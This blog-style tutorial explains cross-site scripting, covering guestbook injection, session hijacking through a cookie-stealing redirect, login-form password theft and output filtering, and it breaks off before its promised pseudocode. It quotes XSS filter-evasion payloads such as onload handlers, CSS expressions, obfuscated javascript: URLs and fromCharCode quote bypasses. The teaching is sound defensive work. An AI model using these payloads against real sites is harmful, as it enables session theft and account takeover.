::: What is Cross Site Scripting (XSS)? :::
XSS is simply tricking a web server into presenting malicious HTML to the user. Usually the intent is to steal session information.
Scripts may also be used to change the contents of web pages in order to displays false information to the visitor, and it may be used to redirect forms so that secret data are posted to the attacker's computer. XSS generally attacks the user of the web application, not the application itself. The attacks are possible when the web application lacks proper output filtering. We will look into that further down this article.
::: Some Example Exploits :::
Let's begin with a simple example. we'll use the old school web site 'Guestbook' as our example here. In our imaginary guestbook, the user can enter anything they want and then that text is appended to what was there before. Remember when Guestbooks worked like this? Some (actually MANY still do!).
Let's say our villian enters the following:

What happens? Well nothing seems to happen at first, but when his text gets mixed with old and new greetings, the web application will pass this to visitors reading the guest book:

Now look, the villians output appears to be part of the HTML code. Standard compliant browsers will treat < !-- as a start comment marker, and as they don't find any end comment markers, most of them actually hide all text below that of the villain. Not a particularly high-grade attack, but annoying anyway. What would have happened if the attacker instead had entered something like this:

This time, when the guestbook is displayed, the page will attempt to open 10,000 windows that could potentially be porn or other embaressing material.
Now let's look at an example discussion site that our kids may use. The site lacks output filtering and is succeptable to XSS attacks. So our villian enters the following in his message:

If the image is displayed in the browsers of all the kids, the site will surely make the headlines somewhere. And for certain kinds of images, the police may even come knocking on the doors of the unknowing persons running the site. That would suck if you were that person.
Clearly something needs to be done. But before we look at how to prevent this, let's look at some more serious examples.
::: Session Hijacking :::
As cookies are available to a script, Cross-site Scripting may be used to hijack cookie-based sessions. If a bad guy gets access to someone else's session cookie, he may often appear as that someone to the server by installing the cookie in his own browser.
When people hear about XSS-based Session Hijacking for the first time, sometimes they have a hard time understanding how the process works (like my ex-boss for example). It's important to understand under what context the Session ID cookie is available to the attacker's script. As you know, a victim that logs into a site gets a unique Session ID cookie assigned to him. The attacker wants that cookie to impersonate the user (the victim). And he can't get it by tricking the victim into visiting the attacker's own web server: as the domain names do not match, the victim's browser will not send the cookie to him. So, how does the attacker get to the cookie? Well, maybe this graphic will help you.
Simplest possible Session Hijacking example
(clip art courtesy of Vinson Media, thanks Vinny)
The wanted cookie exists only in communication between the victim and the target web server (associated with step 2 in my figure above). For a script to successfully access this cookie, it will have to be included in pages sent from the web server directly to the victim's browser. Let's say the web server in question hosts a discussion application that is vulnerable to XSS because it allows scripts in notes entered by the users (again, you would think that there are not anymore of these, but ohhhhhhhhhhhh there are plenty. Google "sign my guestbook" and search a bit - you will find TONS of sites that are XSS vulnerable).
Anyways, back to our discussion application.
The attacker first joins a discussion, entering a note that contains some cookie-stealing JavaScript (step 1 in the figure). The web server stores the note in its internal database. Later, another user, the victim, logs in to the discussion site. Upon logging in, he receives his personal session ID from the web server. When the user asks to read the attacker's note, the web server builds a web page containing the note text, including the malicious script. This page is then passed to the victim (step 2).
As part of displaying the web page, the victim's browser will also run the script. The script picks up the cookie that is associated with the web page, meaning the cookie containing the session ID, and immediately passes the cookie to the attacker's computer (step 3). After receiving the cookie, the attacker installs it in his own browser, and visits the discussion web server (step 4). The web server receives the stolen session ID from the attacker, and thinks it is talking to the victim. The attacker now fully impersonates the victim on the discussion site. He may post notes in the name of the victim, block him from the site by changing his password, and in some cases even get access to the password of the victim, paving the way to other sites on which the victim uses the same password. See all the havoc that can be caused? Ugh...
Now I will fill in some details for you.
The malicious script makes the browser of the victim pass the cookie to the computer owned by the attacker. Passing the cookie is most easily done using a script that redirects the browser to a web server running on the attacker's computer, taking the cookie with it on the journey. A JavaScript that gives the cookie to the attacker's web server may look like this:

The above script uses document.location.replace to instruct the user's browser to immediately visit another URL, namely steal.php on the attacker's web server. steal.php is a small web application that accepts a what parameter, which the above JavaScript carefully fills in. The what parameter describes what steal.php is supposed to steal. The JavaScript running in the victim's browser assigns the built-in variable document.cookie to this parameter. document.cookie is a JavaScript variable that contains any cookies associated with the connection between the browser executing the script and the server providing the web page. what will thus contain the session ID cookie if such a thing is present.
Obviously the victim will quickly realize that something is going on, as both the URL and the contents of the web page suddenly change. His browser no longer visits the intended web site, but rather that of the attacker. To hide the theft, the attacker's web server may generate a response containing a new redirect that immediately sends the browser back to the original site. If steal.php is supposed to be generic, the attacker may extend it to accept a second parameter called whatnext, a URL that dictates where the second redirect should go. The extended cookie-stealing JavaScript may look somewhat like this:

This time, steal.php accepts two parameters, the what that we have seen before, and the new whatnext which is supposed to contain a URL. The URL given by whatnext is used by steal.php to create a new web page containing another JavaScript that immediately instructs the browser to jump back to the good site. Note the use of an additional cookie named stolen. If this cookie is present, the script will do nothing. Otherwise, the script will add the new stolen cookie. The cookie is added to avoid redirection loops. If the victim is redirected back to the page containing the attacker's script, the script will run again, and redirect a second time to the attacker's server, which in turn redirects back, and so on. With the additional cookie, the initial redirect happens only once. In cases where the attacking script is not stored on the target web server, the loop avoidance code is not needed.
Based on the above script, steal.php would respond with a new web page containing nothing more than this little redirection code:

After giving this redirection to the browser, steal.php will notify the attacker that a new secret has been stolen, maybe by sending him an E-mail. If the attacker is a little bit cunning, he may even program steal.php to exploit the user and the target web site automatically.
Let's sum it all up by this step-by-step overview on XSS-based session hijacking that includes the above "stealth" method:
1. The attacker somehow makes the good site, on which the victim has a session, include a cookie-stealing JavaScript in a page presented to the victim.
2. The victim's browser receives the script from the good site and executes it. The script immediately redirects the browser to the web server of the bad guy, taking the session ID cookie with it as part of the URL.
3. Upon receiving the request, the bad guy's stealing application extracts the cookie from the URL, and generates a reply page containing another redirection script pointing back to the good site.
4. The victim's browser receives the new web page from the attacker's server. It then runs the new redirection script, which asks it to fetch a new page from the good server.
5. The attacker inserts the stolen cookie in his own browser, and connects to the good site. The good site will mistake him for the victim.
The user may see a short flicker, but he will otherwise not be able to tell that his browser paid a quick visit to the attacker's web server. Not even the browser's history will be able to tell the tale, as document.location.replace overwrites the current history entry with the new URL.
::: Stealing Passwords :::
Many log-in scripts redisplay the user name if log-in fails. They generate a new log-in form in which the previously entered user name is filled in, in the belief that it was the password that was entered incorrectly. Quite user friendly, and not at all a bad thing to do. Unless you're vulnerable to XSS.
A system for small payments, created by a large, multi-nationall consulting company in cooperation with a couple of banks, did just that. I read about it about a year and a half ago. And as they did not forbid scripts in the user name, they made it possible to steal other users' passwords via XSS.
The original ASP/VBScript code to redisplay the log-in form after a failed log-in attempt probably looked like this:

If you are ASP programmer, then this should look VERY familiar to you.
You may see that the value attribute of the username input field is set to reflect the user name given in the failed log-in. Unfortunately, this user name is filled in with no handling of metacharacters, making it possible for an attacker to create a separate web page that looks like this:

The page contains an auto-posting form that sends an invalid log-in attempt to the payment site. If you look carefully, you see that the value attribute uses single quotes rather than double quotes to encapsulate the value that makes up the malicious script. HTML allows either single or double quotes. The use of single quotes makes it possible to have double quotes as part of the value. And the double quotes play a major role in this scam: when included in the original log-in form, those double quotes terminate the value attribute of the original input field for the user name. The attacker's log-in attempt, provoked by the above form, gives a user name that looks like this:

When the payment site creates its response page to the invalid log-in, it includes the script code by the attacker (i added space for readability):

Once included in the real log-in page, the script replaces the action attribute of the form so that it posts the user name and password to the attacker's server rather than to the payment site's server.
If the attacker tricks the victim into viewing the first form, and from there to attempt to log-in to the payment site, the attacker gains the user name and the password of the victim.
A side note. Platforms that automatically escape quotes, such as PHP, will make it hard to include JavaScript string constants in incoming data. An attacker may, however, create strings without using quotes, with the help of the fromCharCode method of the JavaScript String object. The method takes a list of character codes, and returns the string built from concatenating the matching characters. As an example, the string constant "ABC" may be replaced with the following, in order to bypass quote filtering:
String.fromCharCode(65,66,67)
The three numbers are the ASCII values of the characters "A", "B" and "C."
::: The Solution :::
The solution is easy! FILTER YOUR OUTPUT.
With HTML encoding, one maps certain HTML metacharacters to their character entity equivalents. The mapping is done according the following, simple algorithm:
1. Map every occurrence of & (ampersand) to &
2. Then replace every " (double quote) with "
3. Then every < (less than) with <
4. And finally replace every > (greater than) with >
5. If the application uses single quotes to encapsulate tag attributes, you may need to replace the single quote character with ' too.
Chances are that you need not implement this algorithm yourself. Several web programming languages already provide a function for doing the mapping, such as the htmlspecialchars of PHP, and Server.HTMLEncode of ASP/VBScript. Before using one of these built-in functions, you should make sure they actually encode all four characters given above, and also the single quote if you need it.
The implication of doing HTML encoding is that the browser will display data exactly as they were written. Imagine, for instance, a forum for osix mathematicians. When someone enters a note containing 2<3, the browser will run into problems unless it is given the HTML encoded version: 2<3. When given HTML character entities rather than, for instance, less than and greater than characters, the browser will not interpret the entities as tag markers. Anything an attacker (or an osix mathematician) writes will thus be visible in the browser window, rather than being interpreted as markup by the browser. Just something to keep in mind.
::: Tag Filtering (selective) :::
HTML encoding of everything isn't possible in all applications. Take web publishing systems, for instance. The publisher will want to include some markup in order to make paragraphs and headings, to include images and links, and so on. In some publishing systems it may be OK to give the publisher full control, while other systems will have to restrict his actions. Like when the "publisher" is one of thousands of users entering notes in a discussion forum. Similarly for web-based E-mail programs. One will likely want to allow HTML formatted E-mails, without letting those E-mails contain scripts and other potentially harmful code.
So, how do you allow innocent markup while rejecting the bad? Before looking at methods in more detail, let's see how hard it may be to avoid malicious HTML content if we want to allow some markup.
A former ISP of mine offered its customers access to their mailbox through a web based E-mail program, similar to Hotmail. Since they allowed HTML formatted E-mails, they couldn't use plain HTML encoding when displaying the contents of the mails. Instead they had to do some filtering. As always, I was curious: I wanted to check whether they successfully removed scripts from mails before viewing them in the users' browsers. So I sent myself some E-mails, and found that they were actually quite good at filtering. Except for one thing: if my E-mail contained the following code, I was able to have a script run in the receiver's browser:
<body onload="alert('gotcha')">
They had forgotten about the onload attribute of the body tag, and my browser gave me a nice little alert box with "foobar" in it as I read the mail. Next test: one of my friends happened to be customer of the same ISP, and he agreed to help me out. I sent him an E-mail with that body tag in it, but this time the alert statement was replaced by a session-stealing script like I talked about above. As soon as he read my mail, I received his session cookie. I immediately updated my Netscape Navigator's cookies file to include the cookie, and told Navigator to visit the E-mail web site of the ISP. This time I didn't see my own mailbox. Instead the E-mail application thought I was my friend, and I was able to read his E-mails, and send new mails from his account. And it all worked even if HTTPS was used by both my friend and me. True story, no shit.
Similar problems have been found in several on-line E-mail services, including even Hotmail, and in popular discussion applications. In 2002, XSS-related vulnerabilities were reported almost daily to international security mailing lists. Still are today.
Allowing some markup but not all is hard, because there are so many ways to insert scripts in an HTML document other than using the obvious script tag. What follows are a few examples on how scripts may be included. Some examples contain the word ANY as part of the tag or of an attribute: ANY may be replaced by any tag or attribute name, even illegal ones, and the script inclusion will still work.
For starters, you have that well-known script tag that is understood by any browser supporting client-side scripting:

Then, with the venerable Netscape Navigator, you can even use style tags to enclose a script:

In 2001, some kid reported that the popular Hotmail service was vulnerable to the latter style tag attack by sending them an E-mail.
And if you happen to come across a Microsoft Internet Explorer, you may include a script with any tag, as long as you're able to add a style attribute:
< ANY style=" ANY: expression(eval('alert('script')'))"/>
To make things harder, both Navigator and Internet Explorer support JavaScript URLs as well:
<img src="javascript:alert('script');"/>
OK, so we need to look at the attribute values too, not just the tags. The simple approach would be to filter out any occurrence of javascript: that one would find as part of a URL. Unfortunately, that would not be enough. Those forgiving browsers, for reasons unknown, let you break the javascript keyword with white space, and they still run the script:
<img src="java
script:alert('script');"/>
script:alert('script');"/>
Oh well, then we'll have to filter based on white space too. But wait, there's more. The browsers are really forgiving: they even let you represent the white space using HTML character entities, and they still parse the string as a JavaScript URL:
<img src="java script:alert('script');"/>
By the way, Navigator is not the only browser to support encapsulation of scripts in style tags as seen above. With those helpful JavaScript URLs, Internet Explorer is vulnerable too:
<style type="text/css">
@import url(javascript:alert('script'));</style>
@import url(javascript:alert('script'));</style>
Unfortunately, browsers do not care about whether the HTML document is well-formed or not. You may include, for example, body tags anywhere, including inside the document body. And as seen above, body tags accept an onload attribute that may contain a script. The lightweight, fast, and standard-compliant Opera , the open-source and standard-compliant Mozilla, the age-old but still not-quite-dead Netscape Navigator and the often-used Internet Explorer all execute a script when they encounter the following tag anywhere inside a document:
<body onload="alert('script')">
And then, of course, you have onclick, ondblclick, onmousedown, onkeypress and all the other on attributes that may be added to most tags.
And as if all the above wasn't enough, old (before version 5) Netscape Navigators support what has been called JavaScript entities:
< ANY ANY="&{alert(' script');};"/>
Anything between &{and}; in a tag attribute will be interpreted as a script. A very good reason why the & character should be transformed into its HTML character entity representation too.
There are probably many more ways to insert scripts in all the browsers out there. If you want to allow some markup, beware that avoiding scripting may be very hard.
Let's see what to do when we want to keep the good tags while getting rid of the bad. We will need to parse the HTML much like the browser does to find the tags. If we find a tag we don't like, we have several possible approaches on how to handle it, depending on the application:
We could HTML encode the entire tag. The result would be that the end user would see what tag someone had written, without having the tag interpreted by the browser. May be a good alternative when we know that no bad tags should be present at all, for instance when writing a web-based E-mail application.
We could remove the entire tag. In that case it is probably a good idea to repeat the washing process until no more changes are done, otherwise we risk that <scr<script>ipt> becomes <script>, for example. Removing things in a single iteration may be dangerous.
We could rename the tag so that <script> becomes <disabled-script>, for instance. The latter is not understood by the browsers, so it will be ignored. It is still possible to spot the unwanted tag by taking a look at the HTML source.
So much for the bad tags. But what about the good ones? The ones we want to keep? It could be tempting to just include them directly, but after seeing all the examples above, we probably know that even good tags may carry malicious attributes. So here we go again. For each good tag, we need to parse the attributes to separate the good from the bad. The onclick attribute and friends, for instance, should always be considered bad if we want to avoid scripts. Bad attributes could be removed, or they could be renamed to something harmless.
But what about the good attributes? Could we just include them? Nope! We need an additional step. If we want to allow the img tag, we clearly want to allow the src attribute, as it specifies the URL of the image. But as you have seen above, URLs are not always good, for instance when the method is javascript rather than http, ftp, file or something similar. And for Netscape Navigator, any attribute may be bad if the value contains &{...};. So, for good attributes, we even need to analyze the value. And that analysis must cope with HTML character entities to treat javascript: and javascript, for example, as the same (97 is decimal ASCII for the lower case character ‘a'). In addition, the values must be considered depending on the context: javascript: is no problem in the value attribute of an input tag of type text, but it may be troublesome in the src attribute of an input tag of type image. Quite some focus needed. A lot of focus actually, and a clear understanding of how different tags and attributes will be handled by the browsers.
We've been talking about good and bad tags, attributes and attribute values. How do we decide what is good and what is bad? Let's look at some psuedocode:
No comments:
Post a Comment